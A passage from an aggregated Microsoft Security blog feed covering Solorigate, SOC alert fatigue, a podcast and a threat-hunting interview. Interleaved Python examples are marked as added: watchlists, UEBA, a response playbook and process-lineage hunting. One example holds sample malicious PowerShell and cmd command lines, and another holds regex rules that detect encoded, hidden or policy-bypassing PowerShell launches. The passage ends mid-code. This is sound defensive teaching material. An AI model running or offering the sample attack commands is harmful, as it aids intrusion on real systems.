Customer Guidance: One of the things our customers should consider is managing identity and access from the cloud. When you rely on on-premises services, like an authentication server, it is up to the customer to protect their identity infrastructure. With a cloud identity provider, like Azure Active Directory, we protect the identity infrastructure from the cloud. Our cloud-scale machine learning systems reason over trillions of signals in real time, so we can detect and remediate attacks that nobody else can see.

Strengthen the community of defenders

Finally, we know that we all have an important role to play in strengthening and empowering the defender community at large. It was great to see this sharing in action in December when FireEye first alerted the community of a “global intrusion campaign.”  

At Microsoft, communicating and collaborating with our customers and partners is a top priority. Over the past several weeks, security teams across Microsoft (Microsoft Threat Intelligence Center/MSTIC, Microsoft Detection and Response Team/DART, Microsoft Cyber Defense Operations Center/CDOC and Microsoft Security Response Center/MSRC) met daily and directly collaborated with customers and partners to share information and respond. We shared the latest threat intelligence, indicators of compromise (IOC), published more than 15 blogs with technical guidance and best practices, and notified customers of potentially related activity. We also offered security trials across our end-to-end product portfolio to give organizations the tools needed to combat this threat.  

This sharing is invaluable to the entire community.  

Customer Guidance: We encourage every company, of every size, to work with the community to share information, strengthen defenses and respond to attacks. Join our Microsoft Security and Compliance Tech Community to start or participate in a variety of community discussions. 

Security is a journey of progress over perfection, and with these three approaches working in unison, we can all help to make the world safer and more secure.

The post Turning the page on Solorigate and opening the next chapter for the security community appeared first on Microsoft Security.

6 strategies to reduce cybersecurity alert fatigue in your SOC

Microsoft Malware Protection Center - Wed, 02/17/2021 - 2:00pm

Today, organizations are faced with the increasingly difficult task of trying to protect their expanding digital estate from sophisticated cybersecurity threats. Migration to the cloud and a mobile workforce have dissolved the network boundary and projected the digital estate beyond its traditional confines. Data, users, and systems are everywhere. Additionally, these systems are increasingly domiciled in the cloud and generate a considerable amount of security data. To add to this, on average, companies with over 1,000 employees maintain about 70 security products from 35 different vendors, according to a recent report by CCS Insight. The end result? A vast number of alerts that security operations center (SOC) teams have to contend with. Unsurprisingly, according to an ESG¹ study, 44 percent of these alerts go uninvestigated due to a combination of talent scarcity and the multiplicity of security solutions generating a huge volume of alerts.

To help our customers address alert fatigue while maintaining detection efficacy, Microsoft is leveraging the power of threat intelligence, native solution integration, AI, and automation to deliver a unique SIEM and XDR approach. But first things first: what exactly are alerts, events, and incidents in the context of security operations? Below is a graphic that will help answer this question before we delve deeper into how Microsoft technology is helping SOC teams sift through high volumes of alerts and narrow them down to manageable high-fidelity incidents.

Let us now look at the six strategies that Microsoft employs to help our customers deal with the alert fatigue problem:

1. Threat intelligence

To combat cyberthreats, Microsoft amalgamates trillions of daily signals, across all clouds and all platforms, for a holistic view of the global security ecosystem. Using the latest in machine learning and artificial intelligence techniques—plus the power of smart humans—we put these signals to work on behalf of our customers taking automated actions when threats are detected, and providing actionable intelligence to security teams when further contextual analysis is required.

2. Native integration

Microsoft leverages the tight integration across its threat protection solution stack to help customers connect the dots between disparate threat signals and develop incidents by grouping quality alerts from different parts of their environment and stitching together the elements of a threat. First-party security solutions within the Microsoft 365 Defender offering enable our customers to benefit from real-time interactions amongst the tools, backed by insights from the Intelligent Security Graph. As a result, the quality of alerts is improved, false positives are significantly reduced at source, and in some cases, automatic remediation is completed at the threat protection level. Additionally, this can be combined with log data drawn from third-party solutions such as network firewalls and other Microsoft solutions to deliver an end-to-end investigation and remediation experience, as depicted in the image below.

3. Machine learning

The third strategy that we employ is ingesting billions of signals into our security information and event management (SIEM) solution, Azure Sentinel, and then passing those signals through proven machine learning models. Machine learning is at the heart of what makes Azure Sentinel a game-changer in the SOC, especially in terms of alert fatigue reduction. With Azure Sentinel we are focusing on three machine learning pillars: Fusion, Built-in Machine Learning, and “Bring your own machine learning.” Our Fusion technology uses state-of-the-art scalable learning algorithms to correlate millions of lower-fidelity anomalous activities into tens of high-fidelity incidents. With Fusion, Azure Sentinel can automatically detect multistage attacks by identifying combinations of anomalous behaviors and suspicious activities that are observed at various stages of the kill chain.

On the basis of these discoveries, Azure Sentinel generates incidents that would otherwise be difficult to catch. Secondly, with built-in machine learning, we pair years of experience securing Microsoft and other large enterprises with advanced capabilities around techniques such as transfer learning to bring machine learning within reach of our customers, allowing them to quickly identify threats that would be difficult to find using traditional methods. Thirdly, for organizations with in-house capabilities to build machine learning models, we allow them to bring those into Azure Sentinel to achieve the same end goal of alert noise reduction in the SOC. Below is a real-life depiction, captured within a certain month, where machine learning in Azure Sentinel was used effectively to reduce signal noise.

4. Watchlists

Watchlists ensure that alerts with the listed entities are promoted, either by assigning them a higher severity or by alerting only on the entities defined in the watchlist. Among other use-cases, Azure Sentinel leverages Watchlists as a high-fidelity data source that can be used to reduce alert fatigue. For example, this is achieved by creating “allow” lists to suppress alerts from a group of users or devices that perform tasks that would normally trigger the alert, thereby preventing benign events from becoming alerts.
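The two watchlist behaviours described above, promotion of listed entities and scoped suppression of known-benign ones, are shown in the following added example. It is not Azure Sentinel’s implementation: the alerts, users, devices and rule names are constructed, and the severity scale and the decision to scope an allow list to specific rules (so that a backup account is silenced for mass file reads but not for a new admin role) are our own design choices.

```python
"""Watchlist-driven alert promotion and scoped suppression.

Added example, not Azure Sentinel's implementation. It assumes alerts and
watchlists have been loaded into the plain dictionaries used here; every
alert, user, device and rule name is constructed sample data, and the
severity scale and the "rules" scoping field are our own design choices.
"""
from dataclasses import dataclass

SEVERITY_ORDER = ["informational", "low", "medium", "high"]


@dataclass(frozen=True)
class Watchlist:
    name: str
    entity_field: str      # which alert field to match: "user" or "device"
    entries: frozenset     # entity values on the list
    mode: str              # "promote" raises severity, "suppress" drops the alert
    rules: frozenset = frozenset()  # for "suppress": only these rules may be silenced;
                                    # an empty set silences nothing (fail closed)


def promote(severity):
    """Raise severity by one step on the ordered scale, capped at the top."""
    i = SEVERITY_ORDER.index(severity)
    return SEVERITY_ORDER[min(i + 1, len(SEVERITY_ORDER) - 1)]


def apply_watchlists(alert, watchlists):
    """Return (alert, decision) where decision is 'suppressed', 'promoted' or 'unchanged'.

    Promotion is evaluated before suppression so that an entity on a VIP list is
    never silenced by a broader allow list.
    """
    alert = dict(alert)
    for wl in watchlists:
        if wl.mode == "promote" and alert.get(wl.entity_field) in wl.entries:
            alert["severity"] = promote(alert["severity"])
            alert.setdefault("tags", []).append(wl.name)
            return alert, "promoted"
    for wl in watchlists:
        if (wl.mode == "suppress"
                and alert.get(wl.entity_field) in wl.entries
                and alert["rule"] in wl.rules):
            return alert, "suppressed"
    return alert, "unchanged"


def triage(alerts, watchlists):
    """Run every alert through the watchlists; keep only what an analyst should see."""
    kept, counts = [], {"promoted": 0, "suppressed": 0, "unchanged": 0}
    for alert in alerts:
        alert, decision = apply_watchlists(alert, watchlists)
        counts[decision] += 1
        if decision != "suppressed":
            kept.append(alert)
    return kept, counts


# Constructed watchlists.
WATCHLISTS = [
    Watchlist("vip-users", "user", frozenset({"cfo"}), "promote"),
    Watchlist("backup-service-accounts", "user", frozenset({"svc-backup"}), "suppress",
              rules=frozenset({"mass-file-read"})),
    Watchlist("vuln-scanners", "device", frozenset({"scanner-01"}), "suppress",
              rules=frozenset({"port-scan-detected"})),
]

# Constructed alerts.
ALERTS = [
    {"rule": "mass-file-read", "user": "svc-backup", "device": "srv-01", "severity": "medium"},
    {"rule": "new-admin-role", "user": "svc-backup", "device": "srv-01", "severity": "medium"},
    {"rule": "impossible-travel", "user": "cfo", "device": "lt-07", "severity": "medium"},
    {"rule": "port-scan-detected", "user": "", "device": "scanner-01", "severity": "low"},
    {"rule": "port-scan-detected", "user": "", "device": "ws-22", "severity": "low"},
]

if __name__ == "__main__":
    kept, counts = triage(ALERTS, WATCHLISTS)
    print(counts)
    for a in kept:
        print(a)
```

Of the five constructed alerts, two are suppressed (the backup account’s mass file read and the scanner’s port scan), the CFO’s impossible-travel alert is raised to high, and the backup account’s new admin role survives because the allow list does not cover that rule.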


5. User and entity behavior analytics

User and entity behavior analytics (UEBA) is natively built into Azure Sentinel, targeting use cases such as abuse of privileged identities, compromised entities, data exfiltration, and insider threat detection. Azure Sentinel collects logs and alerts from all of its connected data sources, then analyzes them and builds baseline behavioral profiles of your organization’s entities (users, hosts, IP addresses, applications, and more) across peer groups and time horizons. With the UEBA capability, SOC analysts are now empowered to reduce not just false positives but also false negatives. UEBA achieves this by automatically leveraging contextual and behavioral information from peers and the organization that typical alert rules tend to lack. The image below depicts how UEBA in Azure Sentinel narrows down to only the security-relevant data to improve detection efficiency:
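The baselining idea, an entity’s activity compared both with its own history and with its peer group, is illustrated by the added example below. It is not the UEBA engine in Azure Sentinel: the users, peer groups and ten-day download histories are constructed, and the 1.0 floor on the standard deviation and the 3-sigma threshold are assumptions chosen for the illustration. The example also handles the case the paragraph implies but does not spell out: a user with no peers is judged on self-history alone rather than against a baseline built from nothing.

```python
"""Peer-group and self-history baselines for one entity's daily activity.

Added example, not the UEBA engine in Azure Sentinel. It assumes that daily
per-user event counts (here: files downloaded per day) have already been
aggregated out of the connected logs; the users, peer groups, histories,
the 1.0 standard-deviation floor and the z-score threshold of 3 are all
constructed assumptions.
"""
from statistics import mean, pstdev

STD_FLOOR = 1.0     # assumption: never treat a perfectly flat history as zero noise
Z_THRESHOLD = 3.0   # assumption: flag when the day is more than 3 sigma from a baseline

# Constructed 10-day histories of daily download counts, with a peer group per user.
HISTORY = {
    "alice": {"group": "finance", "daily": [10, 12, 11, 9, 10, 12, 11, 10, 9, 11]},
    "bob":   {"group": "finance", "daily": [8, 9, 10, 9, 8, 10, 9, 9, 8, 10]},
    "carol": {"group": "eng",     "daily": [50, 55, 52, 49, 51, 53, 50, 52, 54, 50]},
}


def zscore(value, samples):
    """Standard score of value against samples, with a floor on the spread."""
    return (value - mean(samples)) / max(pstdev(samples), STD_FLOOR)


def peer_samples(user, history=HISTORY):
    """All daily counts of the user's peers, excluding the user's own history."""
    group = history[user]["group"]
    return [c for u, h in history.items()
            if u != user and h["group"] == group
            for c in h["daily"]]


def score_activity(user, todays_count, history=HISTORY):
    """Compare today's count with the user's own past and with the peer group.

    z_peer is None when the user has no peers, so the verdict then rests on
    self-history alone. Both directions count: a sudden drop can mean a log
    source went quiet, which is worth a look too.
    """
    z_self = zscore(todays_count, history[user]["daily"])
    peers = peer_samples(user, history)
    z_peer = zscore(todays_count, peers) if peers else None
    worst = max(abs(z) for z in (z_self, z_peer) if z is not None)
    return {"user": user, "z_self": z_self, "z_peer": z_peer,
            "anomalous": worst > Z_THRESHOLD}


if __name__ == "__main__":
    print(score_activity("alice", 40))   # far above her own and her peers' baseline
    print(score_activity("carol", 52))   # a normal day, and no peers in "eng"
```

Alice downloading 40 files scores roughly 29 sigma against her own history and 31 against Bob’s, so it is flagged; Carol’s 52 is a fraction of a sigma from her own norm and she has no peers, so nothing fires. A rule with a fixed threshold of, say, 30 downloads per day would have flagged Carol every single day.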

6. Automation

The lower tiers of a SOC are typically tasked with triaging alerts, and this is where the critical decisions need to be made as to whether alerts are worth investigating further or not. It is also at this point that automation of well-known tasks that do not require human judgment can have the most significant impact in terms of alert noise reduction. Azure Sentinel leverages Logic Apps native to Azure to build playbooks that automate tasks of varying complexity. Using real-time automation, response teams can significantly reduce their workload by fully automating routine responses to recurring types of alerts, allowing SOC teams to concentrate on unique alerts, analyzing patterns, or threat hunting. Below is an example of a security playbook that opens a ticket in ServiceNow and sends a message to an approver. If the approver confirms, with the click of a button, that the activity from a malicious IP is a true positive, the IP is automatically blocked at the firewall and the user’s ID is disabled in Azure Active Directory.
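The playbook just described has two stages: the part that needs no judgment (open the ticket, notify the approver) runs immediately, and the containment actions run only on a confirmed verdict. The added example below is our own rendering of that flow in plain Python, not an Azure Sentinel or Logic Apps playbook. ServiceNow, the firewall, Azure Active Directory and the approver chat are replaced by an in-memory `Connectors` mock; the incident, IP addresses and user names are constructed; and the two guardrails, refusing to block addresses inside the organization’s own ranges and refusing to disable break-glass accounts, are design choices we added because an automated action on a wrong verdict is the failure mode to plan for.

```python
"""Approval-gated response playbook with guardrails and an audit trail.

Added example, not an Azure Sentinel / Logic Apps playbook. The ticketing,
firewall, identity and messaging systems are replaced by an in-memory
'Connectors' mock, and the incident, IP addresses and user names are
constructed; the internal address ranges and the break-glass exclusion list
are our own assumptions.
"""
import ipaddress
from dataclasses import dataclass, field

# Assumption: the organization's own address space; a playbook must never
# firewall these off on the strength of a single verdict.
INTERNAL_RANGES = [ipaddress.ip_network(n) for n in
                   ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
BREAK_GLASS = {"emergency-admin"}  # constructed: accounts automation must never disable


class Connectors:
    """In-memory stand-in for ServiceNow, the firewall, Azure AD and the approver chat."""

    def __init__(self):
        self.tickets, self.messages = {}, []
        self.blocked_ips, self.disabled_users = set(), set()

    def open_ticket(self, summary):
        ticket_id = f"INC{len(self.tickets) + 1:04d}"
        self.tickets[ticket_id] = {"summary": summary, "state": "open"}
        return ticket_id

    def close_ticket(self, ticket_id, note):
        self.tickets[ticket_id].update(state="closed", note=note)

    def notify_approver(self, ticket_id, text):
        self.messages.append((ticket_id, text))

    def block_ip(self, ip):
        self.blocked_ips.add(ip)

    def disable_user(self, user):
        self.disabled_users.add(user)


@dataclass
class Incident:
    source_ip: str
    user: str
    ticket_id: str = ""
    audit: list = field(default_factory=list)


def blockable(ip):
    """Only addresses outside our own ranges may be blocked; malformed input is refused."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return not any(addr in net for net in INTERNAL_RANGES)


def stage_notify(incident, c):
    """Stage 1 needs no human judgment, so it runs unconditionally."""
    incident.ticket_id = c.open_ticket(
        f"Suspicious activity from {incident.source_ip} by {incident.user}")
    c.notify_approver(incident.ticket_id, "Confirm true positive to block IP and disable user?")
    incident.audit.append(f"ticket {incident.ticket_id} opened, approver notified")
    return incident


def stage_respond(incident, verdict, c):
    """Stage 2 runs only after the approver's verdict; every action is guarded and idempotent."""
    if verdict != "true_positive":
        c.close_ticket(incident.ticket_id, f"closed as {verdict}, no action taken")
        incident.audit.append(f"verdict {verdict}: no containment")
        return incident
    if blockable(incident.source_ip):
        if incident.source_ip not in c.blocked_ips:  # re-running the playbook is harmless
            c.block_ip(incident.source_ip)
        incident.audit.append(f"blocked {incident.source_ip} at the firewall")
    else:
        incident.audit.append(f"refused to block {incident.source_ip}: internal or invalid address")
    if incident.user in BREAK_GLASS:
        incident.audit.append(f"refused to disable break-glass account {incident.user}")
    else:
        c.disable_user(incident.user)
        incident.audit.append(f"disabled {incident.user} in the identity provider")
    c.close_ticket(incident.ticket_id, "contained")
    return incident


def run_playbook(incident, verdict, c):
    """Full flow: notify, then act on the verdict the approver returned."""
    return stage_respond(stage_notify(incident, c), verdict, c)


if __name__ == "__main__":
    conn = Connectors()
    # Constructed incident: 203.0.113.5 is a documentation address, not a real host.
    done = run_playbook(Incident("203.0.113.5", "jdoe"), "true_positive", conn)
    print("\n".join(done.audit))
```

The audit list is the part worth keeping in a real playbook: every refusal is recorded alongside every action, so the approver can see not only what was done but what the guardrails prevented.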


We have looked at six effective strategies that organizations can use to minimize alert fatigue and false positives in the SOC. When combined across a unified ecosystem that includes threat intelligence, the Microsoft Security suite, UEBA, and automation and orchestration capabilities tightly integrated with the Azure platform and Azure Sentinel, alert noise can be significantly reduced. Additionally, Azure Sentinel offers capabilities such as alert grouping and the intuitive Investigation Graph, which automatically surfaces prioritized alerts for investigation and also provides automated expert guidance when investigating incidents. To significantly increase your detection rates and reduce false positives while simplifying your security infrastructure, consider including our unique SIEM and XDR solution, comprising Azure Sentinel and Microsoft Defender capabilities, in your threat defense and response strategy.

Additional resources

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

Special thanks to Sarah Young, Chi Nguyen, Ofer Shezaf, and Rafik Gerges for their input. 

¹ ESG: Security Analytics and Operations: Industry Trends in the Era of Cloud Computing, 2019.

The post 6 strategies to reduce cybersecurity alert fatigue in your SOC appeared first on Microsoft Security.

Afternoon Cyber Tea: Evaluating individual and organizational cyber risk in a pandemic

Microsoft Malware Protection Center - Tue, 02/16/2021 - 2:00pm

Cybersecurity professionals find themselves in high demand as organizations worldwide continue to grapple with how to secure millions of remote workers. James Turner is an industry analyst at CISO Lens and served as an adjudicator from 2017 to 2019 for the Australian government’s cyber war games: Operation Tsunami. In this episode of Afternoon Cyber Tea, James and I talk about how the COVID-19 pandemic has accelerated the critical need for cooperation across the cybersecurity industry, as well as the need for strengthening communication between governments and private organizations.

Our discussion really examines how the pandemic has pushed organizations toward greater cost efficiencies and a new mainstreaming of cybersecurity—democratizing the language and tools to make it part of everyone’s “9 to 5” experience.

“Everyone has a plan until they get hit in the face,” as James puts it. “Ransomware is off the hook—one organization just got hit with a 10 million dollar ransom. That’s more than the average Australian or New Zealand organization spends on security in a year.”

If the old saying that every crisis presents an opportunity holds true, James sees the pandemic as a tremendous catalyst for better information sharing amid budget cuts and a fragmented workforce. “The security operating centers at large banks are on speed-dial with each other because the attack against Company A hits Company B the next day. No organization, or even an entire country, can do it all by themselves.”

During our talk, we also touch on how the pandemic has pushed security professionals to look at new ways of optimizing delivery, such as utilizing an integrated security solution rather than an expensive niche product. “It’s given businesses a new appreciation for automatic patching,” James recounts. “My group of CISOs is discussing installing agents on personal devices; the legalities and logistics around that. Budgets are becoming an issue; so, I’m encouraging them to think like startups—get creative.”

James and I also examine how security professionals need to do a better job of evangelizing across the entire IT sector, including developing a ground-level understanding of your own organization’s business units. Cybersecurity will only be truly effective when it’s no longer part of an org chart but simply part of everyone’s job.

To hear my complete conversation with James Turner, listen to the full episode.

What’s next

In this ongoing podcast series, I talk with cybersecurity influencers about the evolving threat landscape and explore the promise of systems powered by AI, IoT, and other emerging tech. In every episode, we’ll look at empowering people and organizations to create a more secure, productive digital environment.

Listen to Afternoon Cyber Tea with Ann Johnson on:
  • Apple Podcasts: You can also download the episode by clicking the Episode Website link.
  • Podcast One: Includes the option to subscribe, so you’re notified as soon as new episodes are available.
  • CISO Spotlight page: Listen alongside our CISO Spotlight episodes, where customers and security experts discuss similar topics such as Zero Trust, compliance, going passwordless, and more.

In the meantime, bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity. Or reach out to me on LinkedIn or Twitter if you have guest or topic suggestions.

The post Afternoon Cyber Tea: Evaluating individual and organizational cyber risk in a pandemic appeared first on Microsoft Security.

A playbook for modernizing security operations

Microsoft Malware Protection Center - Thu, 02/11/2021 - 2:00pm

The security community is continuously changing, growing, and learning from each other to better position the world against cyber threats. In the latest post from our new Voice of the Community blog series, Microsoft Product Marketing Manager Natalia Godyla talks with Dave Kennedy, Founder and Chief Technology Officer at Binary Defense. Dave shares his insights on security operations—what these teams need to work effectively, best practices for maturing the security operations center (SOC), as well as the biggest security challenges in the years to come.

Natalia: What are the standard tools, roles, frameworks, and services for a security operations team? What are the basic elements a SecOps team needs to succeed?

Dave: Your security operations team must have visibility into your infrastructure, both on-premises and off-premises. Visibility is key because many of these attacks start with one compromised asset or one compromised credential. They spread across the network and, in many cases, they wreak a lot of damage. Your endpoints, network infrastructure, and cloud environments are where a lot of these issues happen. I recommend starting with high-risk areas like your endpoints.

Then, you need somewhere to ingest that data, such as security information and event management systems like Microsoft Azure Sentinel, and to go through log analysis and determine if anything has been compromised.

Also, frameworks like the MITRE ATT&CK framework are a great baseline of saying, well, here are specific attacks that we’ve seen in the wild that are mapped to specific adversaries that are in our industry vertical. That can help you prioritize those, get better at detection, and make sure you have the right logs coming into your environment to build detections.

Natalia: How can a team operationalize the MITRE ATT&CK framework?

Dave: When people first look at the MITRE ATT&CK framework, they freak out because it’s so big, but it’s a treasure trove of information. Everybody was focused on a castle mentality of being able to protect everything, but what happens when an attacker is in your environment? Protection is still very important and you want to have protective mechanisms in place, but protection takes time and requires cultural changes in many cases. If you’re doing something like multifactor authentication, you have to communicate that to users.

The MITRE ATT&CK framework tells you what happens when attackers have gotten around your preventive controls. What happens when they execute code onto a system and take other actions that allow them to either extract additional information or move to different systems through lateral movement or post-exploitation scenarios and get access to the data? The MITRE ATT&CK framework is a way to conceptualize exactly what’s happening from an attacker’s standpoint and to build detections around those attack patterns.

With the damage we see, it’s usually several hours, days, or months that an attacker has had access to an environment. If we can shave that time down and detect them in the first few minutes or the first few hours of an attack and shut them down, we’ve saved our company a substantial amount of damage. It’s a framework to help you understand what’s happening in your environment and when unusual activities are occurring so you can respond much more effectively.

Natalia: How much of the MITRE ATT&CK framework should a security team build into their detections? How much should they rely on existing tools to map the framework?

Dave: Many tools today have already done a lot of mapping to things like the MITRE ATT&CK framework, but it’s not comprehensive. If you have an endpoint detection and response product, it may cover only 20 percent of the MITRE ATT&CK framework. Mapping your existing tools and technology to the MITRE ATT&CK framework is a very common practice. For instance, you may have an email gateway that uses sandboxing virtualization techniques that detonate potential malware to see whether it’s effective. That’s one component of your technology stack that can help cover certain components of the MITRE ATT&CK framework. You might have web content filtering that covers a different component of the framework, and then you have endpoint detection and responses (EDRs) that cover a percentage of the endpoint detection pieces.

Technology products can help you shave away the amount of effort that goes into the MITRE ATT&CK framework. It’s really important, though, that organizations map those out to understand where they have gaps and weaknesses. Maybe they need additional technology for better visibility into their environment. I’m a huge fan of the Windows systems service, System Monitor (Sysmon). If you talk to any incident responder, they’ll tell you that if they have access to Sysmon data logs, that’s a treasure trove of information from a threat hunting and incident response perspective.

It’s also important to look at it from an adversary perspective. Not every single adversary in the world wants to target your organization or business. If you’re in manufacturing, for instance, you’re not going to be a target of all adversaries. Look at what the adversaries do and what type of industry vertical they’re targeting so you don’t have to do everything in the MITRE ATT&CK framework. You can whittle the framework down to what’s important for you and build your detections based on which adversaries are most likely to target your organization.

Natalia: If a team has all the basics down and wants to mature their SecOps practices, what do you suggest?

Dave: Most security operations centers are very reactive. Mature organizations are moving toward more proactive hunting or threat hunting. A good example is if you’re sending all of your logs through Azure Sentinel, you can do things like Kusto Query Language and queries in analysis and data sets to look for unusual activity. These organizations go through command line arguments, service creations, parent-child process relationships, or Markov chaining, where you can look at unusual deviations of parent-child process relationships or unusual network activity.

It’s a continual progression starting off with the basics and becoming more advanced over time as you run through new emulation criteria or simulation criteria through either red teaming or automation tools. They can help you get good baselines of your environment and look for unusual traffic that may indicate a potential compromise. Adversary emulations are where you’re imitating a specific adversary attacker through known techniques discovered through data breaches. For example, we look at what happened with the SolarWinds supply chain attack—and kudos to Microsoft for all the research out there—and we say, here are the techniques these specific actors were using, and let’s build detections off of those so they can’t use them again.

More mature organizations already have that in place, and they’re moving toward what we call adversary simulation, where you take a look at an organization’s threat models and you build your attacks and techniques off of how those adversaries would operate. You don’t do it by using the same type of techniques that have previously been discovered. You’re trying to simulate what an attacker would do in an environment and whether a blue team can identify those.

Natalia: What are best practices for threat hunting?

Dave: Threat hunting varies based on timing and resources. It doesn’t mean you have to have dedicated resources. Threat hunting can be an exercise you conduct once a week, once a month, or once a quarter. It involves going through your data and looking for unusual activity. Look at all service creations. Look at all your command line arguments that are being passed. A large percentage of the MITRE ATT&CK framework can be covered just by parent-child process relationships and command line auditing in the environment. Look at East to West traffic, not just North to South. Look at all your audit logs. Go through Domain Name System (DNS) traffic.

For instance, a user was using Outlook and then clicked on an email that opened an Excel document that triggered a macro that then called PowerShell or cmd.exe. That’s an unusual activity that you wouldn’t expect to see from a normal user, so let’s hone in on that and figure out what occurred.

You can also conduct more purple teaming engagements, where you have a red team launch attacks and detection teams look through the logs at the same time to build better detections or see where you might have gaps in visibility. Companies that have threat hunting teams make it very difficult for red teamers to get around the different landmines that they’ve laid across the network.
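The two hunting ideas Dave raises, a Markov-style baseline of parent-child process relationships (in his answer on maturing SecOps) and the Outlook to Excel to PowerShell chain described above, as an added Python example. This is not code from the post, Binary Defense or Microsoft; the Sysmon-style records, the rarity thresholds and the Office-application and script-host lists are constructed assumptions for the illustration.

```python
"""Process-lineage hunting over Sysmon-style process creation records.

Added example (not code from the post, Binary Defense or Microsoft). The
records below are constructed to mimic Sysmon Event ID 1 fields
(ParentImage, Image, CommandLine); the rarity thresholds are assumptions.
"""
import ntpath
from collections import Counter

# Constructed baseline activity: repeated, expected parent -> child spawns.
BENIGN = [
    (r"C:\Windows\System32\services.exe", r"C:\Windows\System32\svchost.exe",
     "svchost.exe -k netsvcs"),
    (r"C:\Windows\explorer.exe",
     r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE", "OUTLOOK.EXE"),
    (r"C:\Windows\explorer.exe",
     r"C:\Program Files\Google\Chrome\Application\chrome.exe", "chrome.exe"),
    (r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE", "EXCEL.EXE /dde"),
]
# Constructed chain from the interview: mail client -> spreadsheet -> shell.
SUSPICIOUS = [
    (r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -w hidden -enc <base64 placeholder>"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),
]
SAMPLE_EVENTS = BENIGN * 5 + SUSPICIOUS

# Assumed lists for the fixed rule; extend them for your own environment.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}


def image_name(path):
    """Normalise a Windows image path to its lower-case file name."""
    return ntpath.basename(path).lower()


def build_baseline(events):
    """Markov-style baseline: how often each parent spawns each child, and how
    active each image is overall (as a parent or as a created child)."""
    pairs, activity = Counter(), Counter()
    for parent_path, child_path, _ in events:
        parent, child = image_name(parent_path), image_name(child_path)
        pairs[(parent, child)] += 1
        activity[parent] += 1
        activity[child] += 1
    return pairs, activity


def transition_probability(baseline, parent, child):
    """Fraction of the parent's observed activity that is this particular spawn."""
    pairs, activity = baseline
    return pairs[(parent, child)] / activity[parent] if activity[parent] else 0.0


def rare_transitions(events, baseline, threshold=0.25, min_count=2):
    """Spawns that are rare for their parent, or hardly ever seen at all."""
    pairs, _ = baseline
    seen, findings = set(), []
    for parent_path, child_path, cmdline in events:
        pair = (image_name(parent_path), image_name(child_path))
        if pair in seen:
            continue
        seen.add(pair)
        prob = transition_probability(baseline, *pair)
        if prob < threshold or pairs[pair] < min_count:
            findings.append((*pair, round(prob, 3), cmdline))
    return findings


def office_spawning_script_host(events):
    """Fixed rule: an Office application launching a script or shell host."""
    return [(image_name(p), image_name(c), cmd) for p, c, cmd in events
            if image_name(p) in OFFICE_APPS and image_name(c) in SCRIPT_HOSTS]


def hunt(events):
    """Run both the statistical and the fixed check over one batch of events."""
    baseline = build_baseline(events)
    return {"rare_transitions": rare_transitions(events, baseline),
            "office_to_script_host": office_spawning_script_host(events)}


if __name__ == "__main__":
    for kind, items in hunt(SAMPLE_EVENTS).items():
        print(kind)
        for item in items:
            print("  ", item)
```

The baseline flags the EXCEL.EXE to powershell.exe spawn because it is a small fraction of everything Excel does in the sample, and the powershell.exe to cmd.exe spawn simply because it has never been seen more than once; the fixed Office-to-script-host rule catches the first independently. On real Sysmon data the baseline should be built from a longer window than the events being hunted, and thresholds tuned per environment.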

Natalia: What should an incident response workflow look like?

Dave: An alert or unusual activity during a threat hunting exercise is usually raised to somebody to do an analysis. A SOC analyst typically has between 30 seconds and four minutes per alarm to determine whether the alarm is a false positive or something they need to analyze. Obviously, what stands out are things like obfuscation techniques, such as where you have PowerShell with a bunch of code that looks very unusual and obfuscation to try to evade endpoint protection products. Some of the more confusing ones are things like living off the land, which are attacks that leverage legitimate applications that are code signed by the operating system to download files and execute in the future.

A research phase kicks off to see what’s actually going on. If it’s determined that there is malicious activity, usually that’s when incident response kicks in. How bad is it? Have they moved to other systems? Let’s get this machine off the network and figure out everything that’s happening. Let’s do memory analysis. Let’s figure out who the actual attacker was. Can we combine this with red intelligence and determine the specific adversary? What are their capabilities? You start to build the timeline to ensure that you have all the right data and to determine if it’s a major breach or self-contained to one individual system.

We ran several incident response scenarios for customers that were impacted by the supply chain attacks on SolarWinds, and the biggest challenge for the customers was that their logs didn’t go back that far, so it was very difficult for them to say definitively, with evidence, that they knew what happened.
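One way to give an analyst with a few minutes per alarm a quick first read on a PowerShell command line, as an added Python example that is not code from the post, Binary Defense or Microsoft: it scores common launch flags, token splitting with backticks or carets, and character entropy, and decodes an -EncodedCommand payload so the analyst sees plain text instead of base64. The rule weights, the decision thresholds and the three sample command lines are constructed assumptions.

```python
"""Triage heuristics for suspicious PowerShell command lines.

Added illustration; the weights, thresholds and sample command lines are
constructed for the example and are not from Binary Defense or Microsoft.
"""
import base64
import binascii
import math
import re
from collections import Counter

# (name, pattern, weight). The weights are assumptions, not a published scale.
# Patterns accept the abbreviated parameter forms powershell.exe allows.
RULES = [
    ("encoded_command", re.compile(r"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+[A-Za-z0-9+/=]{16,}"), 3),
    ("hidden_window", re.compile(r"(?i)(?:^|\s)-w[a-z]*\s+hidden"), 2),
    ("policy_bypass", re.compile(r"(?i)(?:^|\s)-e(?:p|x[a-z]*)\s+bypass"), 2),
    ("no_profile", re.compile(r"(?i)(?:^|\s)-nop[a-z]*"), 1),
    ("non_interactive", re.compile(r"(?i)(?:^|\s)-noni[a-z]*"), 1),
]
ENCODED_ARG = re.compile(r"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)")
ENTROPY_THRESHOLD = 4.8   # bits/char; ordinary admin command lines stay below this
OBFUSCATION_CHARS = 5     # more backticks/carets than this suggests token splitting

# Constructed payload: a harmless command encoded the way -EncodedCommand expects.
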